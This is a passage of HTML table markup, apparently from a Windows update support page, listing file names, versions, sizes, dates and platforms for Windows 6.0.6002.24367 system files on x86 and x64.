applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>118,784</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>53,248</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>151,552</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>110,592</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>53,248</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>163,840</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>73,728</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>253,952</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>176,128</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>270,336</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>188,416</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>274,432</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>270,336</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>266,240</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>172,032</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>86,016</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>172,032</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>73,728</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>131,072</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>98,304</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>40,960</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>135,168</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>98,304</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>45,056</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll</td><td>6.0.6002.24367</td><td>620,544</td><td>28-Apr-2018</td><td>01:40</td><td>x86</td><td>Not applicable</td></tr><tr><td>Auditpol.exe</td><td>6.0.6002.24367</td><td>41,984</td><td>28-Apr-2018</td><td>01:43</td><td>x86</td><td>Not applicable</td></tr><tr><td>Msaudite.dll</td><td>6.0.6002.24367</td><td>146,432</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Msobjs.dll</td><td>6.0.6002.24367</td><td>58,880</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Ntdll.dll</td><td>6.0.6002.24367</td><td>1,210,040</td><td>28-Apr-2018</td><td>02:43</td><td>x86</td><td>Not applicable</td></tr><tr><td>Oleaut32.dll</td><td>6.0.6002.24367</td><td>574,464</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Ntkrnlpa.exe</td><td>6.0.6002.24367</td><td>3,582,656</td><td>28-Apr-2018</td><td>02:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ntoskrnl.exe</td><td>6.0.6002.24367</td><td>3,494,592</td><td>28-Apr-2018</td><td>02:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Rpcrt4.dll</td><td>6.0.6002.24367</td><td>783,872</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Spsys.sys</td><td>6.0.6002.24298</td><td>342,528</td><td>28-Apr-2018</td><td>01:15</td><td>x86</td><td>Not applicable</td></tr><tr><td>Smss.exe</td><td>6.0.6002.24367</td><td>65,024</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>Not 
applicable</td></tr><tr><td>Videoprt.sys</td><td>6.0.6002.24367</td><td>105,472</td><td>28-Apr-2018</td><td>01:45</td><td>x86</td><td>Not applicable</td></tr></tbody></table></td></tr></tbody></table><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported x64-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td><td><strong class=\"sbody-strong\">Service branch</strong></td></tr><tr><td>Hal.dll</td><td>6.0.6002.24367</td><td>230,592</td><td>28-Apr-2018</td><td>02:50</td><td>x64</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>371,200</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>379,392</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>376,832</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>373,760</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>255,488</td><td>28-Apr-2018</td><td>02:33</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>382,464</td><td>28-Apr-2018</td><td>04:06</td><td>Not 
applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>375,808</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,536</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>366,080</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>383,488</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>380,928</td><td>28-Apr-2018</td><td>04:14</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>352,768</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>349,696</td><td>28-Apr-2018</td><td>04:11</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>374,272</td><td>28-Apr-2018</td><td>04:14</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>380,416</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,536</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>379,392</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>379,904</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,536</td><td>28-Apr-2018</td><td>04:08</td><td>Not 
applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>375,296</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>375,296</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>346,624</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>338,944</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll</td><td>6.0.6002.24367</td><td>1,079,808</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Setbcdlocale.dll</td><td>6.0.6002.24367</td><td>58,368</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Winload.efi</td><td>6.0.6002.24367</td><td>1,102,528</td><td>28-Apr-2018</td><td>02:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe</td><td>6.0.6002.24367</td><td>1,089,216</td><td>28-Apr-2018</td><td>02:50</td><td>x64</td><td>Not applicable</td></tr><tr><td>Winresume.efi</td><td>6.0.6002.24367</td><td>998,080</td><td>28-Apr-2018</td><td>02:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe</td><td>6.0.6002.24367</td><td>987,328</td><td>28-Apr-2018</td><td>02:50</td><td>x64</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>02:28</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>02:30</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>02:31</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>02:28</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:12</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:12</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:07</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.exe.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.efi.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winresume.exe.mui</td><td>6.0.6002.24367</td><td>19,456</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not 
